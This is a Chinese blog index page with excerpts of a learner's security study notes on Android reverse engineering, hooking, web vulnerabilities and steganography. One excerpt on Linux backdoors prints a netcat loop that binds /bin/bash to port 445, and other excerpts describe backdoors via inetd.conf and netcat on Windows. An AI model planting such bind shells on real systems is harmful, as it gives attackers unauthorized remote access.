自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

d_0xff的博客

2016年4月14科比退役最后一战 我开始写下二进制博客 你的结束我的开始

  • 博客(31)
  • 资源 (2)
  • 收藏
  • 关注

原创 python windows下一些较难安装的类库

没有排名 遇到就写下了1.lxmleasy_install –allow-hosts=lxml.de,*.python.org lxml==3.4.2

2017-01-22 10:51:14 358

原创 Windows 免安装(zip)mysql的各种坑

以前安装mysql的时候就知道免安装的各种坑 这次重装系统 下了个最新版的5.7的免安装的 还算顺利 安装步骤如下1.去官网下载mysql.zip2.解压之后 要配置环境my-default.ini 配置:basedir = …..datadir = …..3.命令行管理员权限进入/mysql/bin目录下mysqld –initialize-insecure初始化 会生成data目录 生成表什

2017-01-16 17:57:04 468

转载 Android学习第十三天---Xposed框架理解

这篇文章 http://www.360doc.com/content/14/0625/09/9462341_389540723.shtml1.简介Xposed是GitHUB上rovo89大大设计的一个针对Android平台的动态劫持项目,通过替换/system/bin/app_process程序控制zygote进程,使得app_process在启动过程中会加载XposedBridge.jar这个j

2016-08-30 16:47:52 1358

转载 Android学习第12天-----HOOK技术

今天学习一下hook技术 先科普一下Windows HookWindows操作系统是建立在事件驱动机制之上的,系统各部分之间的沟通也都是通过消息的相互传递而实现的。但在通常情况下,应用程序只能处理来自进程内部的消息或是从其他进程发过来的消息(借助进程间通信技术,如剪贴板,管道,邮槽等),如果需要对在进程外传递的消息进行拦截处理就必须采取一种称为HOOK的技术。钩子(Hook) 是Windows消息处

2016-08-30 11:07:44 674

原创 linux常用命令更新中

查看开放的端口命令是用来查看linux的端口使用情况netstat -tln查看已经连接的服务端口(ESTABLISHED)netstat -a查看所有的服务端口(LISTEN,ESTABLISHED)sudo netstat -aplinux 写入命令touch filename.txt 新建一个txt文件;cat 你要写入的内容 >filename.txt 可以写txt文件, 但原

2016-08-24 16:26:52 282

转载 Android学习第十一天--------Android App AllowBackup

AllowBackup安全风险描述Android API Level 8及其以上Android系统提供了为应用程序数据的备份和恢复功能,此功能的开关决定于该应用程序中AndroidManifest.xml文件中的allowBackup属性值 ,其属性值默认是True。当allowBackup标志为true时,用户即可通过adb backup和adb restore来进行对应用数据的备份和恢复,这可能

2016-08-22 09:18:24 313

转载 Android学习第十天-----本地拒绝服务漏洞之一

本地组件拒绝服务攻击先给一些科普 序列化是什么,为什么要序列化序列化是指把Java对象转换为字节序列并存储到一个存储媒介的过程。反之,把字节序列恢复为Java对象的过程就叫做反序列化。为什么要序列化 JVM(Java Virtual Machine(Java虚拟机)) Java对象存在的前提是JVM有在运行,因此如果JVM没有运行或者在其他机器的JVM是不可能获取到指定的java对象的。而序列

2016-08-12 18:55:50 1765

转载 Android学习第九天---Android数据存储

今天上午学习了IDEA的调试 由于是看别人的帖子学习的图又太多就不抄袭了今天就收集一些Android数据存储相关的知识。大致分为三种数据存储方式,分别为:Saving key-value sets(保存键值对的集合);saving file(磁盘文件);SQL database数据存储第一种:Saving key-value sets(保存键值对的集合)保存键值对的集合采用SharedPrefere

2016-08-04 18:59:15 401

转载 Android学习第八天---smali插桩

这是一个很常用的高效的手法 学习一下 何为插桩,引用一下wiki的解释:程序插桩,最早是由J.C. Huang 教授提出的,它是在保证被测程序原有逻辑完整性的基础上在程序中插入一些探针(又称为“探测仪”),通过探针的执行并抛出程序运行的特征数据,通过对这些数据的分析,可以获得程序的控制流和数据流信息,进而得到逻辑覆盖等动态信息,从而实现测试目的的方法。这个的学习的话 根据这个学习的 阿里云安全工具

2016-08-03 18:27:07 2232

转载 Android学习第七天---记录一次锁机软件的破解

自己学习别人的帖子实战一下试试吧 以后也能装逼 反正这两天心情不好不是很想学习原贴首先安装一下 app提示需要超级管理员权限 一看就不是好东西 给呗然后手机就从新启动了然后就出现了 这个zz的界面 不停的播放音乐 上面标记的两个地方一个事输入的一个是按钮(二维码)基本上很多app都是这个套路 如果找不到可以到Android studio里面看一下框架就知道了现在分析一下这个软件 拖到jeb里面<ac

2016-08-03 10:06:25 3457 2

转载 Android学习第六天-JDB

JDB调试一定是以后经常用的 直觉 我 因为觉得这个名词很牛逼 先学习一下吧。什么是JDBJDB是简单的Java命令行调试器,包含在JDK中jdb附加调试adb forward tcp:54321 jdwp:123jdb -attach localhost:54321但是这种方法我好像没有实现 总是出错 我用了下面的一种方法首先先打开ddms.bat然后输入 adb forward tcp:5432

2016-08-01 18:57:41 627

转载 Android学习第五天-Activity

一些常见的adb 的用法adb shell am adb logcat 用法比如:adb logcat | grep MyAppadb logcat | grep -i myapp #忽略大小写。adb logcat | grep --color=auto -i myapp #设置匹配字符串颜色。更多设置请查看 grep 帮助。今天学习的是Activity组件先来了解一下Android中UID

2016-08-01 18:25:12 433

转载 Android学习第四天 -- 常见漏洞

如果用的es没办法打开sqlite所以才有这步,用re的话就不需要这步可以在手机上直接查看。不过pull到pc上看起来更直观点。 Root权限才能对应用程序目录进行操作。Chmod把权限改为777就可以pull到pc上查看了。今天学习的漏洞是 —WebView File域同源策略绕过漏洞浅析该漏洞源于:JavaScript的延时执行能够绕过file协议的同源检查,并能够访问受害应用的所有私有文件,即

2016-07-29 11:44:03 2059

转载 Android 学习第三天 app测试

要开始为公司干活了 学习app的测试先入手的一个自动化测试app的框架 Dozerdrozer是一款针对Android系统的安全测试框架。drozer可以帮助Android app和设备变得更安全,其提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程的exploit,它可以生成shellcode帮助你进行远程设备管理。http://www.freebuf.com/arti

2016-07-29 09:11:10 527

转载 Android学习第二天 apk里面的文件属性介绍

由于学习过60分的java 所以需要恶补一些知识 首先我们来看一下 AndroidMainfest.xml是每个Android文件中必须的文件,它位于整个项目的根目录,描述了package中暴露的组件和各自实现的类,各种能被处理的数据和启动位置。除了能声明程序中的Activities, ContentProviders , Services , 和int 和instrumentation (安全控制

2016-07-27 16:06:39 937

转载 安卓逆向学习第一天

开始了新的征程 安卓逆向学习的第一天(在吾爱破解上面学习)环境搭建 这些 给出链接 第一步环境配置也可以自己搭建环境 这个是腾讯的一个代理访问点https://dsx.bugly.qq.com/repository/1第二步 初识APK、Dalvik字节码以及Smali下面写出一些介绍APK 就是安卓APP的格式 其实就是一个压缩文件包 我们改为zip解压一下就能看到内部的文件结构。我

2016-07-25 14:33:37 2633

转载 恶意代码实战分析

第一章恶意代码分析技术。1.静态分析初级技术 静态分析就是检查可执行文件 但是不分析具体指令的的一些技术。静态分析可以确定一个文件是否是恶意的,提供有关其功能的信息。有时候还会提供一些信息让你能特征码够生成简单的特征码。2.动态分析初级技术动态分析技术涉及到运行恶意代码并且观察系统上的行为,以移除感染产生有效的特征检测码,或者两者。3.静态分析高级技术静态分析高级技术主要是对恶意代码内部机制的

2016-07-22 10:21:53 2533

转载 文件包含漏洞

简单的来说,就是我们用一个可控的变量作为文件名并以文件包含的的方式调用了它,漏洞就产生了。以PHP为例文件包含漏洞可以分为RFI(远程文件包含)和LFI(本地文件包含漏洞)两种。而区分他们最简单的方法就是php.ini中是否开启了allow_url_include。如果开启了可能包含远程文件,如果不是有可能包含本地的文件。php文件包含漏洞产生的原因是在通过php函数引入文件的时候,由于传入的文件爱

2016-07-12 11:38:30 373

转载 Python urlparse模块解析URL下载

发现一个很好的学习Python的地方。一、urlparse模块功能介绍urlparse模块会将一个普通的url解析为6个部分,返回的数据类型都是元组。同时,它还可以将已经分解后的url再组合成一个url地址。 返回的6个部分,分别是: scheme(机制)、 netloc(网络位置)、 path(路径)、 params(路径段参数)、 query(查询)、 fragment(片段)。二

2016-07-12 09:41:40 3909

原创 一些加密方式(更新中)

就把遇到的一些加密方式收集起来吧URL加密:%E4%B8%AD%E5%9B%BD%E7%89%B9%E8%89%B2解加密平台http://www.bejson.com/enc/urlencode/Unicode转换\u767b\u5f55\u6210\u529f转中文平台:http://www.bejson.com/convert/unicode_chinese/

2016-06-11 01:23:41 42328

转载 Linux后门初探二(利用 /etc/inetd.conf)

这个需要一定的条件在Ubuntu 这个测试 成功Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux这个需要的条件是开启inetd开启方式下载apt-get install openbsd-inetd直接输入dawg:~#

2016-05-28 03:57:53 6353

转载 Linux下后门初探(一)

在Linux下创建后门方式一默认情况下 GNU netcat 不支持持续性监听操作。每一次Accept并执行完命令之后,netcat就会断开连接。如果需要让 netcat 保持持续性监听状态,就必须使用循环语句不断的开启新的监听模式。listener.sh 监听脚本#!/bin/bashwhile [ 1 ]; doecho -n | netcat -l -v -p 445 -e /bin/ba

2016-05-27 22:30:30 1658

转载 windows下盘符路径

%USERPROFILE% ——获取WINDOWS下当前用户路径%WINDIR% 是表示系统目录的系统变量%WINDIR% {系统目录 - C:\WINDOWS}%SYSTEMROOT% {系统目录 - C:\WINDOWS}%SYSTEMDRIVE% {系统根目录 - C:}%HOMEDRIVE%

2016-05-27 01:27:28 986

转载 linux下搜索文件方式一

使用带正则表达式的grep命令!简单使用 在/etc/passwd中搜索vivekgrep vivek /etc/passwd不区分大小写grep -i -w vivek /etc/passwd不区分大小写的检索root 和 admingrep -i -w 'root|admin' /etc/passwd这个例子中就使用了正则表达式的模式固定检索内容的位置: 你可以使用 ^ 和 $ 符号强制一个正

2016-05-26 00:15:23 2032

转载 windows下后门技术(netcat篇)

由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题便携式工具(Portable Applications)便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一

2016-05-25 23:47:13 12064

原创 第一次CTF

第一次参加CTF 比赛 总结一些就是没有好好准备,如果做好了准备 拿第一太轻松了,比赛太紧张了 去了就开始蒙逼蒙逼循环蒙逼。这次太失败了,毕业了没有下次了。

2016-05-25 20:43:31 773

转载 JPEG图像格式Jphide隐写

0x00 隐写原理Jphide是基于最低有效位LSB的JPEG格式图像隐写算法,使用JPEG图像作为载体是因为相比其他图像格式更不容易发现隐藏信息,因为JPEG图像在DCT变换域上进行隐藏比空间域隐藏更难检测,并且鲁棒性更强,同时Blowfish算法有较强的抗统计检测能力。 由于JPEG图像格式使用离散余弦变换(Discrete Cosine Transform,DCT)函数来压缩图像,而这个图像

2016-05-17 04:52:05 5984

转载 关于python字符串的处理

关于python字符串的处理做CTF的时候想写一个Python的编码转换器,本来想十分钟搞定的结果写了俩小时,唉,浪费了好多时间环境python 2.7 + windows + CMD + pycharm 4.5我在CMD下运行C:\Users\Administrator>pythonPython 2.7 (r27:82525, Jul 4 2010, 07:43:08) [MSC v.1500

2016-05-16 00:42:10 4798

转载 CSRF的防御

wooyun大神的讲解 抄袭一遍加深一下记忆关于CSRF的防御 就要牢牢抓住几个特点1.跨域 2.伪造第一种跨域:我们发现CSRF的请求都是跨域的,针对这一点我们可以在服务端对HTTP请求的Referer字段进行检查。一般情况下,用户提交的都是站内的请求,其中Referer中的地址来源应该是站内的地址。至关重要的一点就是前端的JavaScript无法修改Referer字段。这也是这种方法成立的条件

2016-05-16 00:09:06 979

转载 利用pyqt4写Python的图形化界面的笔记

利用pyqt4写Python的图形化界面的笔记在windows下搭建pyqt4的环境很简单但是在mac上我弄了很久也没有弄好下面开始记录一些笔记

2016-05-09 00:13:04 596

原创 二进制学习第一天

学习的文档 逆向基础 windows下cl命令第一天的学习开始CPU就是执行所有程序的工作单元。我们从这个程序开始#include <stdio.h> int main() { printf("hello, world"); return 0;};用MSVC-x86编译器编译 想要使用cl命令两种方法 1.打开开始菜单,visual stuio文件夹下面的visual s

2016-04-14 22:23:13 423

Xposed 框架官方例子

自己写的

2016-08-30

注入安卓进程,并hook java世界的方法

看雪大牛写的

2016-08-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除